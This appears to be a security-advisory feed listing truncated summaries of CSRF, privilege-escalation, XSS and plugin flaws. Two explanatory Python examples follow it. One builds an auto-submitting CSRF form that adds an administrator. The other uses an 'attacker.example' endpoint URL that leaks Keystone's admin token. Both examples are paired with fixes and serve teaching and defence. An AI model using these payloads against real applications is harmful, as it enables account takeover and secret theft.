Dating Pro Genie 2015.7 Cross Site Request Forgery
Advisory ID: HTB23294 Product: Dating Pro Vendor: DatingPro Vulnerable Versions: Genie 2015.7 and probably prior Tested Version: Genie 2015.7 Advisory Publication: February 10, 2016 without technical details Vendor Notification: February 10, 2016 Vendor Patch: February 29, 2016 Public Disclosure:...
Comodo Anti-Virus - SHFolder.dll Local Privilege Elevation Exploit
Exploit for windows platform in category local exploits SHFolder.DLL Local Privilege Elevation Exploit for Comodo Anti-Virus GeekBuddy Component by @LaughingMantis Greg Linares Since it took 146 days to fix a DLL Hijack issue I decided to drop this PoC: Technical Geeky Stuff GeekBuddy stores...
Audit CouchDB - The Simple, Clear, CouchDB Security Assessment
Audit CouchDB is a simple tool with a powerful message. Given an Apache CouchDB URL, it will tell you everything you ever wanted to know about its security. Objective Audit CouchDB will perform the following actions: 1. Learn every possible fact about the couch, for example: What is the server...
SeaWell Networks Spectrum - Multiple Vulnerabilities
Exploit for php platform in category web applications Exploit Title: SeaWell Networks Spectrum - Multiple Vulnerabilities Discovered by: Karn Ganeshen Vendor Homepage: http://www.seawellnetworks.com/spectrum/ Versions Reported: Spectrum SDC 02.05.00, Build 02.05.00.0016 CVE-ID: CVE-2015-8282...
LG Nortel Disclosure / Insecure Configuration / DoS
Title: LG Nortel ADSL modems - Multiple vulnerabilities Discovered by: Karn Ganeshen Vendor Homepage: NA Version Reported: Board ID: DV2020+Product Version: S1.064B2.3H0-0 + Software Version: 3.04L.02V.sip.LE9500.dspApp3341A2pB022f.d19e Timelines April, 2015: Vulnerabilities found April 2015:...
SearchBlox File Exfiltration Denial of Service Vulnerability
SearchBlox is a free, open source enterprise search and analytics toolkit built on the Lucene full-text search engine. A security vulnerability exists in SearchBlox that allows remote attackers to overwrite configuration files, add or remove...
Duplicate App Icons on Receiver for Windows
This article is intended for Citrix administrators and technical teams only. Non-admin users must contact their company’s Help Desk/IT support team and can refer to CTX297149 for more information. Affected users see multiple stores configured CCA4-UK, CCA4-UK1, CCA4-UK2 and so on. Receiver was...
WordPress wp-championship plugin SQL injection vulnerability
WordPress is a blogging platform developed by the WordPress Software Foundation in PHP; it supports setting up personal blog sites on servers running PHP and MySQL. wp-championship is a plugin for running prediction games. A SQL injection vulnerability exists in the...
Kerio Control 8.6.1 - Multiple Vulnerabilities
Exploit for php platform in category web applications Title: Multiple Vulnerabilities in Kerio Control Virtual Appliance Vulnerabilities: SQL Injection, Remote Code Execution through CSRF Product: Kerio Control Homepage: http://www.kerio.com Affected Version: <= 8.6.1 Fixed Version: 8.6.2 partiall...
Pligg CMS 'admin/admin_users.php' Cross-Site Request Forgery Vulnerability
Pligg CMS is an open source content management system (CMS) from Pligg. A cross-site request forgery vulnerability exists in Pligg CMS version 2.0.2. A remote attacker can exploit this vulnerability by causing a logged-in administrator's browser to send a request to the admin/admin_users.php script to add an administrator...
Pligg CMS 2.0.2 - CSRF Add Admin Exploit
Exploit for php platform in category web applications Admin input name="password" type="text" class="form-control" id="password" value="hack...
ISPConfig '/admin/users_edit.php' cross-site request forgery vulnerability
ISPConfig is an open source, Linux-based hosting control panel; through its web interface it can manage multiple servers, create websites, monitor server status and so on. ISPConfig suffers from a cross-site request forgery vulnerability that allows remote...
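The Dating Pro, Pligg CMS and ISPConfig entries above all describe the same "CSRF adds an administrator" pattern: an admin-only form is protected by nothing but the session cookie, which the browser attaches to a cross-site POST automatically. The following is an added illustration written for this page, not code from any of those projects or advisories: a model of the attacker's auto-submitting page, a handler that checks only the session (vulnerable), and the same handler gated by a per-session synchronizer token (fixed). The session store, cookie values, form field names and the victim URL are constructed for the example.

```python
import hmac
import secrets
from html import escape
from urllib.parse import parse_qs

# Constructed session store: session cookie value -> role and a per-session
# CSRF token. A real application keeps this server-side.
SESSIONS = {
    "sess-admin": {"role": "admin", "csrf": secrets.token_hex(16)},
}


def attacker_page(target_url, new_user, new_password):
    """HTML the attacker hosts: an auto-submitting form whose fields mirror
    the admin 'add user' form. The victim's browser attaches the admin's
    session cookie to the resulting cross-site POST."""
    return (
        '<form id="f" method="POST" action="%s">'
        '<input type="hidden" name="username" value="%s">'
        '<input type="hidden" name="password" value="%s">'
        '<input type="hidden" name="role" value="admin">'
        "</form><script>document.getElementById('f').submit();</script>"
        % (escape(target_url, quote=True), escape(new_user, quote=True),
           escape(new_password, quote=True))
    )


def forged_body(new_user, new_password):
    """Body produced by the attacker's form: no token, because a cross-origin
    page cannot read the victim's session-bound token."""
    return "username=%s&password=%s&role=admin" % (new_user, new_password)


def add_user_vulnerable(users, session_cookie, form_body):
    """Model of the vulnerable handler: the session cookie is the only check,
    so a forged cross-site POST from a logged-in admin succeeds."""
    session = SESSIONS.get(session_cookie)
    if session is None or session["role"] != "admin":
        return 403
    params = parse_qs(form_body)
    users[params["username"][0]] = params.get("role", ["member"])[0]
    return 200


def add_user_fixed(users, session_cookie, form_body):
    """Hardened handler: additionally requires a synchronizer token bound to
    the session, compared in constant time; missing or wrong token -> 403."""
    session = SESSIONS.get(session_cookie)
    if session is None or session["role"] != "admin":
        return 403
    params = parse_qs(form_body)
    submitted = params.get("csrf_token", [""])[0]
    if not hmac.compare_digest(submitted, session["csrf"]):
        return 403
    users[params["username"][0]] = params.get("role", ["member"])[0]
    return 200


if __name__ == "__main__":
    users = {}
    body = forged_body("evil", "pw")
    print("vulnerable:", add_user_vulnerable(users, "sess-admin", body), users)
    users = {}
    print("fixed, forged:", add_user_fixed(users, "sess-admin", body), users)
    body += "&csrf_token=" + SESSIONS["sess-admin"]["csrf"]
    print("fixed, legit:", add_user_fixed(users, "sess-admin", body), users)
```

The token is what the attacker's page cannot supply: it is readable only by pages on the victim site's own origin, so a forged POST carrying the cookie but not the token is refused. An Origin/Referer check or a SameSite cookie attribute is a reasonable second layer, but the synchronizer token is the check these advisories' fixes amount to.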
Code injection
Unspecified vulnerability in the Ninja Forms plugin before 2.8.10 for WordPress has unknown impact and remote attack vectors related to admin users...
CVE-2014-9688
Unspecified vulnerability in the Ninja Forms plugin before 2.8.10 for WordPress has unknown impact and remote attack vectors related to admin users...
CVE-2014-9688
CVE-2014-9688 concerns the Ninja Forms WordPress plugin, specifically versions before 2.8.10. The connected sources describe an unspecified vulnerability with unknown impact and remote attack vectors related to admin users. The NVD metrics indicate partial confidentiality, integrity, and availabi...
WordPress Ninja Forms Plugin <= 2.8.9 - Unspecified Vulnerability
This vulnerability in the Ninja Forms plugin has remote attack vectors related to admin users. Solution: update the plugin...
Ninja Forms <= 2.8.9 - Unspecified Issue Affecting Admin Users
This version includes a fix for a potential security vulnerability for admin users...
1830 Photonic Service Switch PSS-32/16/4 Cross Site Scripting
SWISSCOM CSIRT ADVISORY - http://www.swisscom.com/security CVE ID: CVE-2014-3809 Product: 1830 Photonic Service Switch PSS-32/16/4 Vendor: Alcatel-Lucent Subject: Reflected Cross-site Scripting - XSS Effect: Remotely exploitable Author: Stephan Rickauer stephan.rickauer at swisscom.com Date:...
openstack-keystone: configuration data information leak through Keystone catalog
A flaw was found in the keystone catalog URL replacement. A user with permissions to register an endpoint could use this flaw to leak configuration data, including the master admin_token. Only keystone setups that allow non-cloud-admin users to create endpoints were affected by this issue...
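The keystone entry describes a template-substitution leak: endpoint URLs may contain $(name)s placeholders that are expanded when the catalog is built, and the expansion was given the whole configuration, so a registered endpoint of the form http://attacker.example/$(admin_token)s came back with the secret filled in. The following is an added model of that pattern and of an allow-listed fix; it is illustrative code written for this page, not keystone's implementation. The config values, request values and allow-list are constructed.

```python
import re

# Constructed stand-in for keystone.conf values; the secret is the point.
CONFIG = {
    "admin_token": "CONSTRUCTED-ADMIN-TOKEN",  # constructed value
    "public_port": "5000",
    "admin_port": "35357",
}

# Per-request values a catalog URL is legitimately allowed to embed.
REQUEST_VALUES = {"tenant_id": "tenant-1234", "user_id": "user-5678"}

# Keys an endpoint template may reference in the hardened variant.
ALLOWED_KEYS = frozenset(["tenant_id", "user_id", "public_port", "admin_port"])
_TEMPLATE_RE = re.compile(r"\$\((\w+)\)s")


def format_url_vulnerable(url):
    """Model of the flawed pattern: $(key)s is rewritten to Python's %(key)s
    and formatted against every config value merged with the request values,
    so any config key is reachable from a registered endpoint URL."""
    substitutions = dict(CONFIG)
    substitutions.update(REQUEST_VALUES)
    return url.replace("$(", "%(") % substitutions


def format_url_safe(url):
    """Hardened model: only allow-listed keys are ever substituted, and a
    template that references anything else is rejected rather than expanded."""
    referenced = set(_TEMPLATE_RE.findall(url))
    disallowed = referenced - ALLOWED_KEYS
    if disallowed:
        raise ValueError("endpoint URL references disallowed keys: %s"
                         % sorted(disallowed))
    substitutions = {k: v for k, v in {**CONFIG, **REQUEST_VALUES}.items()
                     if k in ALLOWED_KEYS}
    return _TEMPLATE_RE.sub(lambda m: substitutions[m.group(1)], url)


def catalog_leaks_secret(url):
    """True if the vulnerable formatter would put the admin token into the
    catalog entry handed back to whoever lists the catalog."""
    return CONFIG["admin_token"] in format_url_vulnerable(url)


if __name__ == "__main__":
    legit = "http://keystone.example:$(public_port)s/v2.0/$(tenant_id)s"
    hostile = "http://attacker.example/$(admin_token)s"
    print(format_url_vulnerable(legit))
    print(format_url_vulnerable(hostile))   # contains the token
    print(format_url_safe(legit))
    try:
        format_url_safe(hostile)
    except ValueError as exc:
        print("rejected:", exc)
```

The audit check this suggests for a deployment is twofold: confirm that only cloud admins can create endpoints, and grep the catalog for $( placeholders that name anything other than the handful of per-request keys the templates are meant to use.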